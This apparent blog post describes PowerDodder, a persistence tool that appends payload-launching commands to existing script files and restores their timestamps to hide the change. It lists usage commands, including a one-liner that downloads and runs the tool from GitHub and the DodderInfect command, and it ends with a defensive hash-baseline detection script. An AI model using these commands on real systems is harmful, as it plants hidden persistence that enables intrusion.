PowerDodder: The Stealthy New Tool That Hides Malware in Your Script Files
PowerDodder is a post-exploitation persistence utility designed to stealthily embed execution commands into existing script files on the host. By leveraging files that are frequently accessed but rarely modified, it targets high-likelihood execution vectors with minimal detection risk.
Background
Traditional persistence methods (e.g., Registry Run keys, scheduled tasks) are often monitored or flagged by EDRs and blue teams. PowerDodder takes a novel approach:
- It hunts for existing script files on disk (.ps1, .bat, .cmd, .vbs, .js).
- It prioritizes those that:
- Have been accessed recently (indicating they’re being executed often).
- Haven’t been modified recently (suggesting they’re not actively edited).
- It lets you choose the target script(s), and then it appends a payload-spawning command using a context-appropriate syntax (PowerShell, VBScript, JScript, etc.).
This allows for low-noise persistence, hitching a ride on legitimate execution paths.
Name Origin
The name Dodder comes from a parasitic vine that attaches itself to host plants, slowly feeding off them without killing them — much like this tool latches onto host scripts for persistent execution.
Loading the tool into a PowerShell session:
    iex (iwr https://raw.githubusercontent.com/itaymigdal/PowerDodder/refs/heads/main/PowerDodder.ps1)
DodderHunt scans predefined folders (C:\Users\, C:\Program Files\, C:\Program Files (x86)\, C:\ProgramData\) for promising script files:
    DodderHunt
You can also target a specific folder:
    DodderHunt -FolderPath "C:\CustomPath"
Optional params:
-LastAccessTimeThreshold: default is 7 days.
-LastModifyTimeThreshold: default is 3 months.
You can set different thresholds like this:
    $DifferentModifyThreshold = (get-date).AddMonths(-4)
    $DifferentAccessThreshold = (get-date).AddDays(-20)
    DodderHunt -LastAccessTimeThreshold $DifferentAccessThreshold -LastModifyTimeThreshold $DifferentModifyThreshold
Infecting a candidate found by DodderHunt:
    DodderInfect -ID <CandidateID> -PersistCommand <ExecutionCommand>
This will:
- Create the appended line of your command based on the relevant template.
- Modify the file by appending the persistence command.
- Restore the script's original LastWriteTime attribute to hide the modification.
- Move the infected script to the Infected list.
DodderShow: Lists found candidates and already-infected files.
DodderClearCandidates: Empties the current candidates list (useful before rescanning).
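Because DodderInfect restores LastWriteTime, a check that relies on modification timestamps will miss the change, while a content-hash baseline will not. The following is an added example, not code from PowerDodder or this post: it records SHA-256 hashes of the script types DodderHunt looks for in the folders it scans and, on later runs, flags files whose content changed while their LastWriteTime did not; the baseline path C:\ProgramData\ScriptBaseline.json is an assumption.

```powershell
# Added example, not part of PowerDodder: content-hash integrity check for script
# files in the folders DodderHunt scans. The baseline path is an assumption.
$ScriptExtensions = '*.ps1', '*.bat', '*.cmd', '*.vbs', '*.js'
$WatchFolders     = 'C:\Users', 'C:\Program Files', 'C:\Program Files (x86)', 'C:\ProgramData'
$BaselinePath     = 'C:\ProgramData\ScriptBaseline.json'   # store it where attackers cannot edit it
function Get-ScriptInventory {
    param([string[]]$Folders, [string[]]$Extensions)
    $inv = @{}
    foreach ($folder in $Folders) {
        Get-ChildItem -Path $folder -Include $Extensions -Recurse -File -Force -ErrorAction SilentlyContinue |
            ForEach-Object {
                $inv[$_.FullName] = [pscustomobject]@{
                    Path          = $_.FullName
                    Sha256        = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
                    Length        = $_.Length
                    LastWriteTime = $_.LastWriteTimeUtc.ToString('o')   # round-trip format, tick precision
                }
            }
    }
    return $inv
}
function Export-Baseline { param($Inventory, [string]$Path)
    ConvertTo-Json -InputObject @($Inventory.Values) | Set-Content -Path $Path
}
function Import-Baseline { param([string]$Path)
    $inv = @{}
    foreach ($e in @(Get-Content -Path $Path -Raw | ConvertFrom-Json)) { $inv[$e.Path] = $e }
    return $inv
}
function Compare-ScriptInventory { param($Baseline, $Current)
    foreach ($path in $Current.Keys) {
        if (-not $Baseline.ContainsKey($path)) { continue }   # new files: review separately
        $old = $Baseline[$path]; $new = $Current[$path]
        if ($old.Sha256 -eq $new.Sha256) { continue }
        $finding = 'content changed'
        # Changed content, same LastWriteTime, larger file: the append-and-restore pattern described above.
        if ($old.LastWriteTime -eq $new.LastWriteTime -and $new.Length -gt $old.Length) {
            $finding = 'content appended, LastWriteTime unchanged (timestamp restored?)'
        }
        [pscustomobject]@{ Path = $path; Finding = $finding; OldLength = $old.Length; NewLength = $new.Length }
    }
}
# First run records the known-good state; later runs report deviations from it.
$current = Get-ScriptInventory -Folders $WatchFolders -Extensions $ScriptExtensions
if (-not (Test-Path $BaselinePath)) {
    Export-Baseline -Inventory $current -Path $BaselinePath
} else {
    Compare-ScriptInventory -Baseline (Import-Baseline -Path $BaselinePath) -Current $current | Format-Table -AutoSize
}
```

Run it from a scheduled, privileged context and protect the baseline file; for any script flagged with an unchanged LastWriteTime, review its final lines, since that is where the tool appends.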